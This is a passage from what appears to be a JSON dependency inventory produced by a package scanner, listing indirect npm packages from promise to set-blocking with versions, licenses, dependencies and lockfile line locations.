"asap@2.0.6" ], "Locations": [ { "StartLine": 9199, "EndLine": 9207 } ], "AnalyzedBy": "npm" }, { "ID": "promise@8.3.0", "Name": "promise", "Identifier": { "PURL": "pkg:npm/promise@8.3.0", "UID": "e468091686a02ad" }, "Version": "8.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "asap@2.0.6" ], "Locations": [ { "StartLine": 16909, "EndLine": 16917 } ], "AnalyzedBy": "npm" }, { "ID": "promise-all-reject-late@1.0.1", "Name": "promise-all-reject-late", "Identifier": { "PURL": "pkg:npm/promise-all-reject-late@1.0.1", "UID": "557a52905c57abd2" }, "Version": "1.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15358, "EndLine": 15367 } ], "AnalyzedBy": "npm" }, { "ID": "promise-call-limit@3.0.2", "Name": "promise-call-limit", "Identifier": { "PURL": "pkg:npm/promise-call-limit@3.0.2", "UID": "e877b12876882a55" }, "Version": "3.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15368, "EndLine": 15377 } ], "AnalyzedBy": "npm" }, { "ID": "promise-inflight@1.0.1", "Name": "promise-inflight", "Identifier": { "PURL": "pkg:npm/promise-inflight@1.0.1", "UID": "9bf4a5a438c397cd" }, "Version": "1.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16918, "EndLine": 16924 } ], "AnalyzedBy": "npm" }, { "ID": "promise-retry@2.0.1", "Name": "promise-retry", "Identifier": { "PURL": "pkg:npm/promise-retry@2.0.1", "UID": "5c196900ff193161" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "err-code@2.0.3", "retry@0.12.0" ], "Locations": [ { "StartLine": 15378, "EndLine": 15391 }, { "StartLine": 16925, "EndLine": 16938 } ], "AnalyzedBy": "npm" }, { "ID": "prompts@2.4.2", "Name": "prompts", "Identifier": { "PURL": "pkg:npm/prompts@2.4.2", "UID": "a94baf956c9e10f1" }, "Version": "2.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "kleur@3.0.3", "sisteransi@1.0.5" ], "Locations": [ { "StartLine": 16939, "EndLine": 16951 } ], "AnalyzedBy": "npm" }, { "ID": "promzard@2.0.0", "Name": "promzard", "Identifier": { "PURL": "pkg:npm/promzard@2.0.0", "UID": "74d53ea155a3038f" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "read@4.1.0" ], "Locations": [ { "StartLine": 15392, "EndLine": 15402 } ], "AnalyzedBy": "npm" }, { "ID": "prop-types@15.8.1", "Name": "prop-types", "Identifier": { "PURL": "pkg:npm/prop-types@15.8.1", "UID": "300820308fc06c8b" }, "Version": "15.8.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0", "object-assign@4.1.1", "react-is@16.13.1" ], "Locations": [ { "StartLine": 16952, "EndLine": 16962 } ], "AnalyzedBy": "npm" }, { "ID": "protobufjs@7.5.4", "Name": "protobufjs", "Identifier": { "PURL": "pkg:npm/protobufjs@7.5.4", "UID": "c51ca229eeb0566c" }, "Version": "7.5.4", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@protobufjs/aspromise@1.1.2", "@protobufjs/base64@1.1.2", "@protobufjs/codegen@2.0.4", "@protobufjs/eventemitter@1.1.0", "@protobufjs/fetch@1.1.0", "@protobufjs/float@1.0.2", "@protobufjs/inquire@1.1.0", "@protobufjs/path@1.1.2", "@protobufjs/pool@1.1.0", "@protobufjs/utf8@1.1.0", "@types/node@24.7.0", "long@5.3.2" ], "Locations": [ { "StartLine": 16969, "EndLine": 16992 } ], "AnalyzedBy": "npm" }, { "ID": "proxy-from-env@1.1.0", "Name": "proxy-from-env", "Identifier": { "PURL": "pkg:npm/proxy-from-env@1.1.0", "UID": "7569fe4db92a5b0a" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16993, "EndLine": 16998 } ], "AnalyzedBy": "npm" }, { "ID": "pump@3.0.3", "Name": "pump", "Identifier": { "PURL": "pkg:npm/pump@3.0.3", "UID": "6749ac079fa40546" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "end-of-stream@1.4.5", "once@1.4.0" ], "Locations": [ { "StartLine": 16999, "EndLine": 17008 } ], "AnalyzedBy": "npm" }, { "ID": "qrcode-terminal@0.12.0", "Name": "qrcode-terminal", "Identifier": { "PURL": "pkg:npm/qrcode-terminal@0.12.0", "UID": "eec01239b6b6938e" }, "Version": "0.12.0", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15403, "EndLine": 15411 } ], "AnalyzedBy": "npm" }, { "ID": "qs@6.13.0", "Name": "qs", "Identifier": { "PURL": "pkg:npm/qs@6.13.0", "UID": "ee24446d330a5e73" }, "Version": "6.13.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "side-channel@1.1.0" ], "Locations": [ { "StartLine": 17036, "EndLine": 17051 } ], "AnalyzedBy": "npm" }, { "ID": "query-string@7.1.3", "Name": "query-string", "Identifier": { "PURL": "pkg:npm/query-string@7.1.3", "UID": "296b89fc3fdfa19f" }, "Version": "7.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "decode-uri-component@0.2.2", "filter-obj@1.1.0", "split-on-first@1.1.0", "strict-uri-encode@2.0.0" ], "Locations": [ { "StartLine": 17052, "EndLine": 17069 } ], "AnalyzedBy": "npm" }, { "ID": "queue@6.0.2", "Name": "queue", "Identifier": { "PURL": "pkg:npm/queue@6.0.2", "UID": "32576e7a7f45c73d" }, "Version": "6.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4" ], "Locations": [ { "StartLine": 17070, "EndLine": 17078 } ], "AnalyzedBy": "npm" }, { "ID": "queue-microtask@1.2.3", "Name": "queue-microtask", "Identifier": { "PURL": "pkg:npm/queue-microtask@1.2.3", "UID": "8535e5205cda23b4" }, "Version": "1.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17079, "EndLine": 17098 } ], "AnalyzedBy": "npm" }, { "ID": "quick-lru@4.0.1", "Name": "quick-lru", "Identifier": { "PURL": "pkg:npm/quick-lru@4.0.1", "UID": "410b3c1d50b75a83" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17099, "EndLine": 17107 } ], "AnalyzedBy": "npm" }, { "ID": "range-parser@1.2.1", "Name": "range-parser", "Identifier": { "PURL": "pkg:npm/range-parser@1.2.1", "UID": "ec64df248c96fd9a" }, "Version": "1.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17108, "EndLine": 17116 } ], "AnalyzedBy": "npm" }, { "ID": "raw-body@2.5.2", "Name": "raw-body", "Identifier": { "PURL": "pkg:npm/raw-body@2.5.2", "UID": "5e8af3d4a89b1f4a" }, "Version": "2.5.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bytes@3.1.2", "http-errors@2.0.0", "iconv-lite@0.4.24", "unpipe@1.0.0" ], "Locations": [ { "StartLine": 17117, "EndLine": 17132 } ], "AnalyzedBy": "npm" }, { "ID": "rc@1.2.8", "Name": "rc", "Identifier": { "PURL": "pkg:npm/rc@1.2.8", "UID": "84ad3b0f976de249" }, "Version": "1.2.8", "Licenses": [ "(BSD-2-Clause OR MIT OR Apache-2.0)" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "deep-extend@0.6.0", "ini@1.3.8", "minimist@1.2.8", "strip-json-comments@2.0.1" ], "Locations": [ { "StartLine": 17133, "EndLine": 17147 } ], "AnalyzedBy": "npm" }, { "ID": "react-addons-shallow-compare@15.6.2", "Name": "react-addons-shallow-compare", "Identifier": { "PURL": "pkg:npm/react-addons-shallow-compare@15.6.2", "UID": "dec730174f5bb8a6" }, "Version": "15.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fbjs@0.8.18", "object-assign@4.1.1" ], "Locations": [ { "StartLine": 17166, "EndLine": 17175 } ], "AnalyzedBy": "npm" }, { "ID": "react-devtools-core@6.1.5", "Name": "react-devtools-core", "Identifier": { "PURL": "pkg:npm/react-devtools-core@6.1.5", "UID": "97f5180e800a5894" }, "Version": "6.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "shell-quote@1.8.3", "ws@7.5.10" ], "Locations": [ { "StartLine": 17176, "EndLine": 17185 } ], "AnalyzedBy": "npm" }, { "ID": "react-freeze@1.0.4", "Name": "react-freeze", "Identifier": { "PURL": "pkg:npm/react-freeze@1.0.4", "UID": "6df3afc7779e9e70" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "react@19.1.0" ], "Locations": [ { "StartLine": 17207, "EndLine": 17218 } ], "AnalyzedBy": "npm" }, { "ID": "react-is@16.13.1", "Name": "react-is", "Identifier": { "PURL": "pkg:npm/react-is@16.13.1", "UID": "d125f418c72b2c88" }, "Version": "16.13.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10006, "EndLine": 10011 }, { "StartLine": 16963, "EndLine": 16968 } ], "AnalyzedBy": "npm" }, { "ID": "react-is@18.3.1", "Name": "react-is", "Identifier": { "PURL": "pkg:npm/react-is@18.3.1", "UID": "a6183c186aa5c8fc" }, "Version": "18.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17219, "EndLine": 17224 } ], "AnalyzedBy": "npm" }, { "ID": "react-is@19.2.4", "Name": "react-is", "Identifier": { "PURL": "pkg:npm/react-is@19.2.4", "UID": "f170ce4e0971e3f7" }, "Version": "19.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4810, "EndLine": 4815 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-animatable@1.4.0", "Name": "react-native-animatable", "Identifier": { "PURL": "pkg:npm/react-native-animatable@1.4.0", "UID": "75f450ff06e5a118" }, "Version": "1.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "prop-types@15.8.1" ], "Locations": [ { "StartLine": 17282, "EndLine": 17290 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-drawer-layout@4.1.13", "Name": "react-native-drawer-layout", "Identifier": { "PURL": "pkg:npm/react-native-drawer-layout@4.1.13", "UID": "77bd8e306cd3f943" }, "Version": "4.1.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "react-native-gesture-handler@2.28.0", "react-native-reanimated@4.3.0", "react-native@0.81.0", "react@19.1.0", "use-latest-callback@0.2.5" ], "Locations": [ { "StartLine": 17752, "EndLine": 17766 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-fit-image@1.5.5", "Name": "react-native-fit-image", "Identifier": { "PURL": "pkg:npm/react-native-fit-image@1.5.5", "UID": "a839964fea59816" }, "Version": "1.5.5", "Licenses": [ "Beerware" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "prop-types@15.8.1" ], "Locations": [ { "StartLine": 17782, "EndLine": 17790 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-iphone-x-helper@1.3.1", "Name": "react-native-iphone-x-helper", "Identifier": { "PURL": "pkg:npm/react-native-iphone-x-helper@1.3.1", "UID": "7e3209036f1b1132" }, "Version": "1.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "react-native@0.81.0" ], "Locations": [ { "StartLine": 17921, "EndLine": 17929 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-is-edge-to-edge@1.3.1", "Name": "react-native-is-edge-to-edge", "Identifier": { "PURL": "pkg:npm/react-native-is-edge-to-edge@1.3.1", "UID": "d219b560782b7503" }, "Version": "1.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17930, "EndLine": 17939 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-quick-base64@2.2.2", "Name": "react-native-quick-base64", "Identifier": { "PURL": "pkg:npm/react-native-quick-base64@2.2.2", "UID": "9316fc206c78181b" }, "Version": "2.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18219, "EndLine": 18231 } ], "AnalyzedBy": "npm" }, { "ID": "react-refresh@0.14.2", "Name": "react-refresh", "Identifier": { "PURL": "pkg:npm/react-refresh@0.14.2", "UID": "9dc8ef7f609db9f4" }, "Version": "0.14.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 18739, "EndLine": 18747 } ], "AnalyzedBy": "npm" }, { "ID": "read@4.1.0", "Name": "read", "Identifier": { "PURL": "pkg:npm/read@4.1.0", "UID": "4ab748ea2748f753" }, "Version": "4.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mute-stream@2.0.0" ], "Locations": [ { "StartLine": 15412, "EndLine": 15422 } ], "AnalyzedBy": "npm" }, { "ID": "read-cmd-shim@5.0.0", "Name": "read-cmd-shim", "Identifier": { "PURL": "pkg:npm/read-cmd-shim@5.0.0", "UID": "7ea69d023e3792c7" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15423, "EndLine": 15430 } ], "AnalyzedBy": "npm" }, { "ID": "read-pkg@5.2.0", "Name": "read-pkg", "Identifier": { "PURL": "pkg:npm/read-pkg@5.2.0", "UID": "221b9665ccfa8d17" }, "Version": "5.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/normalize-package-data@2.4.4", "normalize-package-data@2.5.0", "parse-json@5.2.0", "type-fest@0.6.0" ], "Locations": [ { "StartLine": 18769, "EndLine": 18783 } ], "AnalyzedBy": "npm" }, { "ID": "read-pkg-up@7.0.1", "Name": "read-pkg-up", "Identifier": { "PURL": "pkg:npm/read-pkg-up@7.0.1", "UID": "652d731ce41c6fe8" }, "Version": "7.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "find-up@4.1.0", "read-pkg@5.2.0", "type-fest@0.8.1" ], "Locations": [ { "StartLine": 18784, "EndLine": 18800 } ], "AnalyzedBy": "npm" }, { "ID": "readable-stream@2.3.8", "Name": "readable-stream", "Identifier": { "PURL": "pkg:npm/readable-stream@2.3.8", "UID": "28ec22b2003e77f5" }, "Version": "2.3.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "core-util-is@1.0.3", "inherits@2.0.4", "isarray@1.0.0", "process-nextick-args@2.0.1", "safe-buffer@5.1.2", "string_decoder@1.1.1", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 17393, "EndLine": 17407 } ], "AnalyzedBy": "npm" }, { "ID": "readable-stream@3.6.2", "Name": "readable-stream", "Identifier": { "PURL": "pkg:npm/readable-stream@3.6.2", "UID": "b6e77a60a3830e62" }, "Version": "3.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4", "string_decoder@1.3.0", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 18898, "EndLine": 18911 } ], "AnalyzedBy": "npm" }, { "ID": "readable-stream@4.7.0", "Name": "readable-stream", "Identifier": { "PURL": "pkg:npm/readable-stream@4.7.0", "UID": "507d373bdefc8a80" }, "Version": "4.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "abort-controller@3.0.0", "buffer@6.0.3", "events@3.3.0", "process@0.11.10", "string_decoder@1.3.0" ], "Locations": [ { "StartLine": 18273, "EndLine": 18288 } ], "AnalyzedBy": "npm" }, { "ID": "redent@3.0.0", "Name": "redent", "Identifier": { "PURL": "pkg:npm/redent@3.0.0", "UID": "ec79150e12ff194f" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "indent-string@4.0.0", "strip-indent@3.0.0" ], "Locations": [ { "StartLine": 18912, "EndLine": 18924 } ], "AnalyzedBy": "npm" }, { "ID": "regenerate@1.4.2", "Name": "regenerate", "Identifier": { "PURL": "pkg:npm/regenerate@1.4.2", "UID": "c78841bd29a4ce0b" }, "Version": "1.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 18954, "EndLine": 18959 } ], "AnalyzedBy": "npm" }, { "ID": "regenerate-unicode-properties@10.2.2", "Name": "regenerate-unicode-properties", "Identifier": { "PURL": "pkg:npm/regenerate-unicode-properties@10.2.2", "UID": "abf96b81188c817e" }, "Version": "10.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "regenerate@1.4.2" ], "Locations": [ { "StartLine": 18960, "EndLine": 18971 } ], "AnalyzedBy": "npm" }, { "ID": "regenerator-runtime@0.13.11", "Name": "regenerator-runtime", "Identifier": { "PURL": "pkg:npm/regenerator-runtime@0.13.11", "UID": "5e82c5b0b8a160d4" }, "Version": "0.13.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 18972, "EndLine": 18977 } ], "AnalyzedBy": "npm" }, { "ID": "regexpu-core@6.4.0", "Name": "regexpu-core", "Identifier": { "PURL": "pkg:npm/regexpu-core@6.4.0", "UID": "64f87b4891460a20" }, "Version": "6.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "regenerate-unicode-properties@10.2.2", "regenerate@1.4.2", "regjsgen@0.8.0", "regjsparser@0.13.0", "unicode-match-property-ecmascript@2.0.0", "unicode-match-property-value-ecmascript@2.2.1" ], "Locations": [ { "StartLine": 18999, "EndLine": 19015 } ], "AnalyzedBy": "npm" }, { "ID": "regjsgen@0.8.0", "Name": "regjsgen", "Identifier": { "PURL": "pkg:npm/regjsgen@0.8.0", "UID": "7d7deabb4f143fc5" }, "Version": "0.8.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19016, "EndLine": 19021 } ], "AnalyzedBy": "npm" }, { "ID": "regjsparser@0.13.0", "Name": "regjsparser", "Identifier": { "PURL": "pkg:npm/regjsparser@0.13.0", "UID": "263b3ed5d4ac9c3c" }, "Version": "0.13.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "jsesc@3.1.0" ], "Locations": [ { "StartLine": 19022, "EndLine": 19033 } ], "AnalyzedBy": "npm" }, { "ID": "require-directory@2.1.1", "Name": "require-directory", "Identifier": { "PURL": "pkg:npm/require-directory@2.1.1", "UID": "2769c21ca3577d6" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19034, "EndLine": 19042 } ], "AnalyzedBy": "npm" }, { "ID": "require-main-filename@2.0.0", "Name": "require-main-filename", "Identifier": { "PURL": "pkg:npm/require-main-filename@2.0.0", "UID": "e2a53a6b0e635eaa" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19043, "EndLine": 19049 } ], "AnalyzedBy": "npm" }, { "ID": "require-resolve@0.0.2", "Name": "require-resolve", "Identifier": { "PURL": "pkg:npm/require-resolve@0.0.2", "UID": "e057e2da984a31e7" }, "Version": "0.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "x-path@0.0.2" ], "Locations": [ { "StartLine": 19050, "EndLine": 19058 } ], "AnalyzedBy": "npm" }, { "ID": "reselect@4.1.8", "Name": "reselect", "Identifier": { "PURL": "pkg:npm/reselect@4.1.8", "UID": "bbdde4199f6e8f64" }, "Version": "4.1.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19059, "EndLine": 19064 } ], "AnalyzedBy": "npm" }, { "ID": "resolve@1.22.10", "Name": "resolve", "Identifier": { "PURL": "pkg:npm/resolve@1.22.10", "UID": "dde810f6eb43dd25" }, "Version": "1.22.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-core-module@2.16.1", "path-parse@1.0.7", "supports-preserve-symlinks-flag@1.0.0" ], "Locations": [ { "StartLine": 19065, "EndLine": 19084 } ], "AnalyzedBy": "npm" }, { "ID": "resolve-from@4.0.0", "Name": "resolve-from", "Identifier": { "PURL": "pkg:npm/resolve-from@4.0.0", "UID": "5a6ff3ba98bd562f" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19108, "EndLine": 19116 } ], "AnalyzedBy": "npm" }, { "ID": "resolve-from@5.0.0", "Name": "resolve-from", "Identifier": { "PURL": "pkg:npm/resolve-from@5.0.0", "UID": "3140fbf798592df1" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2349, "EndLine": 2357 }, { "StartLine": 3506, "EndLine": 3514 }, { "StartLine": 19098, "EndLine": 19107 } ], "AnalyzedBy": "npm" }, { "ID": "restore-cursor@3.1.0", "Name": "restore-cursor", "Identifier": { "PURL": "pkg:npm/restore-cursor@3.1.0", "UID": "446facf583eec76d" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "onetime@5.1.2", "signal-exit@3.0.7" ], "Locations": [ { "StartLine": 19127, "EndLine": 19139 } ], "AnalyzedBy": "npm" }, { "ID": "retry@0.12.0", "Name": "retry", "Identifier": { "PURL": "pkg:npm/retry@0.12.0", "UID": "6b8a315456551e07" }, "Version": "0.12.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15431, "EndLine": 15440 }, { "StartLine": 19140, "EndLine": 19149 } ], "AnalyzedBy": "npm" }, { "ID": "reusify@1.1.0", "Name": "reusify", "Identifier": { "PURL": "pkg:npm/reusify@1.1.0", "UID": "bed5111966d44771" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19150, "EndLine": 19159 } ], "AnalyzedBy": "npm" }, { "ID": "rimraf@3.0.2", "Name": "rimraf", "Identifier": { "PURL": "pkg:npm/rimraf@3.0.2", "UID": "8831dc6e13690657" }, "Version": "3.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "glob@7.2.3" ], "Locations": [ { "StartLine": 19160, "EndLine": 19175 } ], "AnalyzedBy": "npm" }, { "ID": "run-parallel@1.2.0", "Name": "run-parallel", "Identifier": { "PURL": "pkg:npm/run-parallel@1.2.0", "UID": "9ac829ba69d7e79e" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "queue-microtask@1.2.3" ], "Locations": [ { "StartLine": 19176, "EndLine": 19198 } ], "AnalyzedBy": "npm" }, { "ID": "safe-buffer@5.1.2", "Name": "safe-buffer", "Identifier": { "PURL": "pkg:npm/safe-buffer@5.1.2", "UID": "c190e5ced961b56b" }, "Version": "5.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17408, "EndLine": 17413 } ], "AnalyzedBy": "npm" }, { "ID": "safe-buffer@5.2.1", "Name": "safe-buffer", "Identifier": { "PURL": "pkg:npm/safe-buffer@5.2.1", "UID": "6b8fee08702be502" }, "Version": "5.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19219, "EndLine": 19238 } ], "AnalyzedBy": "npm" }, { "ID": "safe-regex-test@1.1.0", "Name": "safe-regex-test", "Identifier": { "PURL": "pkg:npm/safe-regex-test@1.1.0", "UID": "ef63ffed014ae83f" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "es-errors@1.3.0", "is-regex@1.2.1" ], "Locations": [ { "StartLine": 19256, "EndLine": 19272 } ], "AnalyzedBy": "npm" }, { "ID": "safer-buffer@2.1.2", "Name": "safer-buffer", "Identifier": { "PURL": "pkg:npm/safer-buffer@2.1.2", "UID": "3a7b5afd513d580b" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15441, "EndLine": 15448 }, { "StartLine": 19273, "EndLine": 19278 } ], "AnalyzedBy": "npm" }, { "ID": "sax@1.4.1", "Name": "sax", "Identifier": { "PURL": "pkg:npm/sax@1.4.1", "UID": "aa359e039523f58b" }, "Version": "1.4.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19279, "EndLine": 19284 } ], "AnalyzedBy": "npm" }, { "ID": "scheduler@0.26.0", "Name": "scheduler", "Identifier": { "PURL": "pkg:npm/scheduler@0.26.0", "UID": "be036e4d8d4d0ad0" }, "Version": "0.26.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19285, "EndLine": 19290 } ], "AnalyzedBy": "npm" }, { "ID": "semver@5.7.2", "Name": "semver", "Identifier": { "PURL": "pkg:npm/semver@5.7.2", "UID": "df8b05d494ecf3bb" }, "Version": "5.7.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 18880, "EndLine": 18888 } ], "AnalyzedBy": "npm" }, { "ID": "semver@6.3.1", "Name": "semver", "Identifier": { "PURL": "pkg:npm/semver@6.3.1", "UID": "2b454078df7c5dc4" }, "Version": "6.3.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19291, "EndLine": 19299 } ], "AnalyzedBy": "npm" }, { "ID": "semver@7.7.3", "Name": "semver", "Identifier": { "PURL": "pkg:npm/semver@7.7.3", "UID": "853104d11a07cbfb" }, "Version": "7.7.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2358, "EndLine": 2369 }, { "StartLine": 3945, "EndLine": 3957 }, { "StartLine": 4206, "EndLine": 4218 }, { "StartLine": 4308, "EndLine": 4320 }, { "StartLine": 4331, "EndLine": 4343 }, { "StartLine": 4599, "EndLine": 4610 }, { "StartLine": 5652, "EndLine": 5664 }, { "StartLine": 8665, "EndLine": 8677 }, { "StartLine": 10916, "EndLine": 10928 }, { "StartLine": 11482, "EndLine": 11494 }, { "StartLine": 12120, "EndLine": 12132 }, { "StartLine": 13194, "EndLine": 13205 }, { "StartLine": 13256, "EndLine": 13268 }, { "StartLine": 13342, "EndLine": 13353 }, { "StartLine": 15449, "EndLine": 15461 }, { "StartLine": 16458, "EndLine": 16470 }, { "StartLine": 17659, "EndLine": 17670 }, { "StartLine": 18660, "EndLine": 18671 }, { "StartLine": 18704, "EndLine": 18715 }, { "StartLine": 19489, "EndLine": 19500 } ], "AnalyzedBy": "npm" }, { "ID": "semver@7.7.4", "Name": "semver", "Identifier": { "PURL": "pkg:npm/semver@7.7.4", "UID": "d19d7c6aaaecc186" }, "Version": "7.7.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 18316, "EndLine": 18327 } ], "AnalyzedBy": "npm" }, { "ID": "send@0.19.0", "Name": "send", "Identifier": { "PURL": "pkg:npm/send@0.19.0", "UID": "21a5dff31d1828e9" }, "Version": "0.19.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "depd@2.0.0", "destroy@1.2.0", "encodeurl@1.0.2", "escape-html@1.0.3", "etag@1.8.1", "fresh@0.5.2", "http-errors@2.0.0", "mime@1.6.0", "ms@2.1.3", "on-finished@2.4.1", "range-parser@1.2.1", "statuses@2.0.1" ], "Locations": [ { "StartLine": 19300, "EndLine": 19323 } ], "AnalyzedBy": "npm" }, { "ID": "serialize-error@2.1.0", "Name": "serialize-error", "Identifier": { "PURL": "pkg:npm/serialize-error@2.1.0", "UID": "364acc6cf7cf786a" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19360, "EndLine": 19368 } ], "AnalyzedBy": "npm" }, { "ID": "serve-static@1.16.2", "Name": "serve-static", "Identifier": { "PURL": "pkg:npm/serve-static@1.16.2", "UID": "7f32842a6733ad98" }, "Version": "1.16.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "encodeurl@2.0.0", "escape-html@1.0.3", "parseurl@1.3.3", "send@0.19.0" ], "Locations": [ { "StartLine": 19369, "EndLine": 19383 } ], "AnalyzedBy": "npm" }, { "ID": "set-blocking@2.0.0", "Name": "set-blocking", "Identifier": { "PURL": "pkg:npm/set-blocking@2.0.0", "UID": "f0f37a20d4225b89" }, "Version": 